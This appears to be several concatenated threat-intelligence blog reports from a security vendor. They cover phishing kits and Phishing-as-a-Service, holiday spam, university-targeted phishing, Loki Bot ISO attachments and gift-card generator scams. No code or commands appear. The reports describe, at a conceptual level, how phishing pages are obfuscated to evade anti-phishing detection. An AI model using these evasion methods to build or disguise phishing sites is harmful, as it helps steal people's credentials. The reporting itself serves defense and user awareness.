• Invisible HTML tags. A large amount of code is added to the page which does not do anything during the rendering process when code becomes what’s visible on screen — its aim is to make the page harder to detect. See the example below, where chunks of text are hidden among junk HTML tags which do not appear on screen according to the information in the style sheet.

  

  Junk HTML tags

• String slicing. Cutting a string into groups of characters which can be rearranged, and referring to characters by their number in a code table instead of explicitly writing them out. A massive puzzle of these substrings is pieced together when a page is loaded to form the full string.

  

  String slicing: concealing malicious links in code

• Randomized HTML attributes. The randomization of tag attribute values which then have no further use in the code. This is used to trick anti-phishing technologies which work by analyzing layout: when a page’s code contains a lot of variable attributes, the detection rules the technology relies on cannot count all of them because the probability of making a false detection is too high.

It is also worth mentioning that similar forms of obfuscation can also be used by the developers of phishing kits themselves with the aim of getting hold of data their clients have managed to collect using their product. In this case, it is not the text of the phishing page that’s obfuscated, but the code responsible for transferring information back to the creator of the phishing kit is made obscure to prevent the client using the kit from understanding it.

These methods may aim to prevent anti-phishing solutions from finding clues in the original page which would allow them to classify it as a phishing page. However, we have learned how to detect and successfully block these fake pages using deep automated analysis of content.

Phishing-kit pricing and marketplace

Phishing kits can be purchased on insider forums on the dark web or through private Telegram channels. Prices vary and more often than not depend on the level of sophistication and quality a particular kit has to offer. For instance, phishing kits up for sale on one Telegram channel are priced from USD 50 to 900. Moreover, some phishing kits are freely available online.

Phishing kits up for sale on a Telegram channel

Phishing kits are also sold as part of software-as-a-service (SaaS) package. It’s dubbed Phishing-as-a-Service (PHaaS) and lately it’s been growing more popular. The packages consist of a wide range of specialized scamming services: from the creation of fake websites posing as a popular brand to launching a targeted data-theft campaign. This includes studying the target audience, sending out phishing messages, as well as encrypting and sending the stolen data to the client.

For example, one online resource offering Phishing-as-a-Service has a phishing kit for stealing login credentials from a Microsoft account using an invitation to view an Excel document as bait, which can be purchased for a relatively small sum of money. The seller guarantees the product has been tried and tested on all device types. It claims 100% of buyers were satisfied with the quality of the product, and promises to send the victim’s data via e-mail.

Phishing kit for creating a fake website using an Excel document as bait, sold as Phishing-as-a-Service

Statistics

Last year we detected 469 individual phishing kits, which allowed us to block 1.2 million phishing websites. The graph below shows the dynamics of the TOP 10 phishing kits we detected over a period from August 2021 to January 2022, along with the number of unique domains where each of these phishing kits were encountered. Overall, the number of unique domains where we detected content unboxed from phishing kits exceeded 25,000 in October.

Number of unique domains using the TOP 10 phishing kits, August 2021 — January 2022 (download)

Based on the data presented here, we can conclude that some phishing kits are used fairly extensively and survive for a rather long time, while others are no longer visible after a month or two.

Conclusion and advice

Scammers often rely on phishing kits to orchestrate phishing campaigns, especially those who are inexperienced and have a poor grasp of programming. They are relatively simple tools for quickly creating fake websites and collecting the data cybercriminals steal using them. Some kits can also include tools for sending out phishing e-mails, a control panel and dictionaries to localize the phishing attacks.

Cybercriminals usually get their phishing kits from forums on the dark web or closed Telegram channels. Scammers who are poor or on a tight budget can find some basic open-source tools accessible online. Those who are better-off can commission Phishing-as-a-Service, which often includes various phishing kits.

Last year alone, we detected and blocked around 1.2 million phishing pages created using phishing kits. In addition to no-frills phishing kits, we encountered more sophisticated ones which had anti-bot features, geoblocking and anti-detection methods, such as obfuscation and junk code.

Phishing websites are most frequently circulated in spam campaigns via e-mail or messaging app. We recommend users take the following precautions to avoid getting reeled in by the phishers:

• Treat links in e-mails and messages sent by people you don not know with suspicion, as well as “viral” messages which prompt you to forward them to a set number of your contacts. Avoid clicking on links where possible and manually type out the URL in the address bar instead or open the app in question.
• Before entering your login credentials on a website, make sure the URL in the address bar is correct.
• Use a reliable security solution which blocks attempts to follow links leading to phishing websites.

We recommend companies keep track of new phishing kits targeting their clients or employees. You can receive information about phishing kits through services which provide data about cyberthreats, such as Kaspersky Threat Intelligence Portal.

Pre-holiday spam

Easy money

In the run-up to Christmas and New Year, scam е-mails mentioning easy pickings, lottery winnings, and other cash surprises are especially popular. All the more so given how simple it is to adapt existing schemes simply by mentioning the holiday in the subject line.

For example, one scam е-mail with the subject line “Xsmas gift” or “Xmas offer” talks about a “special donation” and provides a contact е-mail address for more information. Recipients who respond are lured into parting with a sum of money through social engineering.

Scammers offering “Xmas gifts” are very persistent

Another Christmas-related scheme aims to steal cryptocurrency. Scammers offer the chance to earn some bitcoins before the holiday period using “secret” software that can be downloaded via a link:

After downloading and running the program (the malware Hoax.Win32.Agent.gen.), the user is prompted to enter their cryptowallet credentials and wait until the request is executed.

Next, the user is informed that the cryptocurrency will be credited to their account immediately after they pay a transfer fee. The result is predictable — the user earns no bitcoins, and the “fee” goes to the scammers.

Extortion

Standard extortion schemes are also adapted for the festive period. For instance, the authors of this е-mail threaten to spoil the victim’s Christmas by smearing them as a pedophile. To prevent this, the recipient needs to transfer the equivalent of $5,000 in bitcoin to the extorters:

Malicious mailings and the corporate sector

Corporate е-mail addresses are also on the cybercriminal radar. To extract confidential information from recipients, or install malware, scammers mask malicious е-mails as business correspondence. In the pre-holiday period, when sales are on the rise, retail finds itself in a special risk zone. E-mails with malicious attachments (DOC or XLS) are sent under the guise of messages related to orders for goods.

For example, hidden in the attachment to this е-mail is Trojan-Downloader.MSOffice.SLoad.sb, which in turn downloads other malware to the victim’s computer:

Malicious attachments can also be disguised as invoices and payment notices. The archive attached to this е-mail actually contains the Trojan-PSW.MSIL.Agensla.hdt stealer, which harvests logins and passwords, and then sends them to the cybercriminals:

Statistics

The share of spam as a percentage of world email traffic gradually increased throughout the entire Q4 2019 and in December amounted to 57.26%. Thus it almost reached the maximum value for the second half of the year — 57.78% (which we recorded in August).

The share of spam in global email traffic, Q3 and Q4 2019

A similar picture was observed in Russia. However, in the fall the growth was less pronounced:
From September to November the amount of spam traffic grew by a total of 0.86 percentage points (compared to a growth rate of 1.14 percentage points for the entire world) to reach 51.15% of total email volume. However, during the last month of the year, the share of spam jumped dramatically by 3.36 p.p. (compared to only 1.44% for the entire world) and exceeded even the summer indicators (54.51% in December as opposed to 53.5 % in July and 53.76% in August). Most likely, such a sharp rise can be attributed to the traditional uptick in holiday season activity by spammers.

The share of spam in Russian email traffic, Q3 and Q4 2019

In the Asia-Pacific region as a whole, we also observed an increase in the amount of spam in email traffic from September (50.19%) to December (52.62%). As you can see from the diagram, the increase is quite gradual. At the same time, the volume of junk messages reached a peak in January, when their share made 55.48%. This is most likely due to the lunar new year, which is celebrated in most of the countries of the region and which this year fell on January 25.

The share of spam in email traffic in the Asia-Pacific Region, July 2019 – January 2020

Christmas/New Year phishing

Fake websites

Phishers lured users onto fake pages with the promise of favorable T&Cs, discounts, gifts. For example, they tried to gain access to Amazon Prime accounts by offering Christmas promotions supposedly on behalf of the service; to take part, users were asked to enter their account credentials.

Besides fake versions of real websites, non-existent stores popped up online offering huge discounts. Their catalogs typically contain a very limited range of premium-class products, and the websites themselves look more like landing pages. A characteristic attribute of such sites is a countdown timer showing how much time is left before the “promotion” ends.

In addition to expensive goods, scammers offer libido-boosting drugs — also at great discounts. The product range in such “medical stores” is not very wide:

The information about the domain shows that it was registered recently, which is another indicator of fakeness.

Nor did scammers overlook gamers. For instance, we discovered phishing pages mimicking the Warface multiplayer website. In honor of New Year, one of the fakes promised gamers 30-days’ free use of some powerful weapons, while another presented a golden rifle for joining Santa’s helpers. To receive either “prize,” players had to enter their username and password on a fake login page, thereby giving the scammers access to their account. Accounts with a high in-game rank and unique, paid-for weapons can fetch a good price.

Cash gifts

Fake websites promising easy money were also given a festive makeover: they offered New Year payouts to the poor, sponsorship gifts, giveaways, etc. As usual in such cases, visitors are invited to complete a simple task, for example, take a survey and enter some personal data. After a five-digit sum seemingly ready for transfer is displayed on screen, the victim is asked to pay a service fee — which, of course, goes straight to the scammers.

To add credibility and urgency, the attackers place eye-catching information to nudge the victim into acting: notifications about the limited nature of the offer, number of visitors who are currently filling in the form, or a “bonuses” countdown:

Crypto fans did not escape phishers’ attention either. It was shortly before Christmas that we came across a scheme offering a festive giveaway of bitcoins and ether supposedly from the Binance crypto exchange. Naturally, to receive a “gift” it was necessary to confirm participation by transferring 5 BTC or 50 ETH to the “organizers.”

To promote the “event,” the scammers posted an article about it on the Medium platform with dozens of enthusiastic comments from “winning” users.

Statistics

In Q4 2019, the share of attacks that sought to steal financial data and accounts at online banks and stores out of the total number of phishing attacks amounted to 52.61%. This exceeds both the indicator for the previous quarter (43.19%) and the indicator for the whole year (51.4%). We observed a similar situation in 2018 and 2017, with the only difference being that the jump was more noticeable last year — from 44.67% on average for the entire year and 34.67% in Q3 to 51.18% in Q4.

The share of phishing attacks on online stores and financial services during Q3 and Q4 of 2017, 2018, and 2019

It is curious that by the end of 2019, fraudsters had partially lost interest in electronic payment services. For the first time in three years, in Q4 the share of phishing attacks on such resources decreased by 1.21 percentage points compared to the previous reporting period and amounted to 14%.

The share of phishing attacks on online stores and financial services during Q3 and Q4 of 2017, 2018, and 2019

At the same time, the popularity of non-financial categories of websites also fell, and in the ranking of the most popular attack targets for the last quarter, payment services rose from fourth to third place, displacing social networks and blogs, which were attacked only in 5.89% of cases. The leading targets by number of phishing attacks in Q4 were bank resources (29.73%), ahead of global Internet portals (22.81%), which had led the ranking during the previous quarter (23.81%).

The distribution of organizations whose users were attacked by phishers by category during Q4 2019

We analyzed the number of attacks on major commercial platforms during the period of November 11 to December 31. The number of attacks during this period jumped as expected shortly before Black Friday, which occurred on November 29, and remained at a high level until the Christmas and New Year holidays. In particular, the number of phishing schemes that were perpetrated under the Ebay brand since mid-November has remained at 1% (of the total number of attacks that used the brand for the specified period), and as of November 27, this figure was 3.15%, and as of December 2, it grew by almost one-and-a-half percentage points to 4.63%.

The distribution of phishing attacks using the Ebay brand by day, November 11, 2019 — December 31, 2019

We observed a similar situation with phishing attacks that utilized the Alibaba brand:
The peak of activity occurred on November 27 and lasted until December 4. In both cases there was a short break in fraudulent activity in the middle of December: On December 15 it fell practically to zero, but it again began to rise with the approach of Christmas and New Year.

The distribution of phishing attacks using the Alibaba brand by day, November 11, 2019 — December 31, 2019

Tips and recommendations

So as not to fall for scams and tricks, it is important to take easy money offers with a massive pinch of festive salt.

If you are a consumer:

• Remember that the only free cheese is in a mousetrap. If you are suddenly offered a reward for taking part in a survey, or a huge discount on luxury goods, be very wary.
• Do not follow links in е-mails or messages in social networks if you have even the slightest doubt.
• Be very careful when making purchases on unfamiliar websites. If an online store has few products, it might not be real. If the URL of a well-known website seems strange, that too is cause for concern.
• Do not install software from unknown sources advertised in е-mails.
• Use a reliable security solution.

If you are a company employee:

• Read incoming е-mails from strangers with a critical eye. To spot malicious content in business correspondence, we recommend that you first check the sender address and autosignature. If they do not match, it should raise a red flag. It is also worth comparing the information in the е-mail with that on the website of the company in whose name the message was sent — the contact details might be completely different.

When we talk about phishing, top of mind are fake banking sites, payment systems, as well as mail and other globally popular services. However, cybercriminals have their fingers in far more pies than that. Unobviously, perhaps, students and university faculties are also in the line of fire. The reason is the research they carry out and the potentially valuable results.

Examples of phishing pages mimicking the login pages of the University of Washington, Harvard Business School, and Stanford University websites

Over the past year, we’ve registered phishing attacks against 131 universities in 16 countries. More than half (83 universities) are located in the US, followed by Britain (21), and Australia and Canada (7 each). Several well-known universities in Finland, Colombia, Hong Kong, India, Israel, the Netherlands, New Zealand, Poland, South Africa, Sweden, Switzerland, and the UAE have also experienced at least one phishing attack in the past year. The most popular universities for fraudsters so far this year are: University of Washington (11.6% of attacks), Cornell University (6.8%), University of Iowa (5.1%).

Although universities are aware of the need to protect their resources, fraudsters exploit the traditional weakest link: user inattentiveness. Depending on the level of access (lecturer, student, research associate), personal accounts on the university site can provide access to both general information as well as paid services and research results. Moreover, a lecturer’s account, for example, can provide attackers with information about salary, schedule, etc. All this can be used for identity theft or a targeted attack.

Cornell NetID is a unique electronic identifier used in combination with a password to provide access to non-public resources and university information

Phishing pages typically differ from the original only by the web address. However, despite the browser warning and, as in the case of the Cornell University fake page, the prompt to check the address bar (copied by the attackers from the original site), users often fail to spot the difference.

Besides login credentials, phishing pages can collect other information for bypassing anti-fraud systems

While analyzing the scripts of one of the phishing pages, we noticed that alongside user names and passwords, fraudsters collect information about IP addresses and the victim’s location. Cybercriminals can use this data to circumvent anti-fraud systems by masquerading as account holders.

How to stay protected

An old, but still important tip is to check the address bar of the site on which confidential data is about to be entered. But since this method relies solely on the human factor, the main recommendation for educational institutions is to use two-factor authentication, and for users — a software solution with anti-phishing capability.

Starting from early July, we have seen malicious spam activity that has targeted corporate mailboxes. The messages discovered so far contain an attachment with an .iso extension that Kaspersky Lab solutions detect as Loki Bot. The malware’s key objective is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets. Loki Bot dispatches all its loot to the malware owners.

ISO images are copies of optical discs that can be mounted in a virtual CD/DVD drive to be used in the same way as the originals. Whereas in days of yore users needed dedicated software to open this type of image, today’s operating systems support the format out of the box, and if you want to access the contents of the file, all you need to do is double-click. Malicious spam uses this type of file as a container for delivering malware, albeit rarely.

As mentioned above, hackers were sending out copies of Loki Bot to company email addresses that could be obtained from public sources or from the companies’ own websites.

The emailed messages were notably diverse:

1. Fake notifications from well-known companies


Imitating messages from well-known corporations is one of the most popular tricks in the hackers’ arsenal. Interestingly enough, fake emails used to be directed mostly at common users and customers, whereas now companies are increasingly the target.

2. Fake notifications containing financial documents


The scammers passed off malicious files as financial documents: invoices, transfers, payments, etc. This is a fairly popular malicious spamming technique, with the message body usually no more than a few lines and the subject mentioning what exactly is purported to be attached.

3. Fake orders or offers


Phishers may pose as customers placing an order, or a vendor offering their goods or services.

Every year we observe an increase in spam attacks on the corporate sector. The perpetrators have used phishing and malicious spam, including forged business emails, in their pursuit of confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc. That’s why today it’s essential for corporate security measures to include both technical protection and training for employees, because their actions may cause irreparable damage to the business.

Quite recently, we (and hence our security solutions) started to designate an entire class of sites — gift card generators — as fraudulent, despite their not stealing any money or personal data from visitors. Why? Let’s try to unpick these sites and see how they work.

How it works

Ads for all kinds of generators can be seen in spam emails and the banners of dubious advertiser networks. The quality of such sites can range from professional to shoddy, but the essence is always the same: the visitor is offered a freely generated gift card code for iTunes, Google Play, Amazon, Steam, and the like. A single site can offer cards of any value for almost every service out there.

As usual with phishing sites, there is no word about why the creators are so charitable, yet plenty of reviews from grateful customers who report that the “generated” code did the trick (if not the first, then the tenth or the hundredth).

A professionally designed generator site…

It should be noted that the code generation algorithms of major firms like Apple or Google are well shielded against attack. And according to cybersecurity experts, the only high-profile case of this kind — when the iTunes code generation algorithm was allegedly compromised by Chinese hackers back in 2009 — actually was more akin to a money laundering scheme. Gift cards supplied by smaller stores are less well protected, but also of little interest to scammers.

… and a simpler variant

To get a code, the user first selects a gift card on the site, whereupon the system begins the “code generation” (or “hacking”) process. To make everything more believable, as in hacker movies, there are plenty of on-screen messages about server connections and other seemingly important operations.

The user does not get to see the generated code in its entirety until confirmation is given that they are human, not a robot. This requires clicking a link and completing a task.

To get the code, users must prove that they are not a robot

Depending on their country of residence, the user might be asked to take a survey, play a lottery, provide details (phone number, postal address), subscribe to a paid SMS service, install adware (which redirects all user searches, harvests information about online activity, and resists deletion), or do something else. The nature of the task is determined by the partner network owning the site that the user is redirected to. The network, in turn, is selected based on the country of residence: each domain zone has partner networks catering to the laws and languages of various countries.

Download a paid ringtone, play a lottery, share personal data — basically, do something risky to prove you’re not a robot

The upshot is unpleasant, but predictable: the victim is either led around various partner sites until they tire of filling out forms and playing lotteries, or they are rewarded with a random set of symbols that has nothing to do with a real code and only mimics the format.

Note that owners of code generator sites try to avoid outright fraud or phishing. They are more than happy with the funds they get from “selling user actions” on partner sites: revenue can range from a few cents for a click on a link to tens of dollars for a filled-out form or a subscription to a paid service. Scrupulous advertisers (they do exist!) of the partner network assume that they are getting data from users genuinely interested in their particular product or service. But the unscrupulous ones don’t really care, as far as they can use this data for spam or similar purposes. This deception of users (and sometimes advertisers too) is the reason why we started to classify generator sites as fraudulent. But the topic of honest and dishonest partners is a discussion for another day.

Exceptions

There are legitimate sites and services that give users discounts and gift cards as part of a loyalty program (for example, in exchange for points earned or purchases made in partner stores). TokenFire and Swagbucks are examples of legitimate apps. Their gift card codes are purchased from the vendor openly and honestly, and issued to clients who have done enough to cover the company’s expenses and deliver a profit. In other words, to receive a gift, the user has to spend a sizable amount of money and/or time. By contrast, generator sites look far more appealing, since they require very little. But as our research shows, that is because they give even less in return — nothing in fact, besides dashed expectations.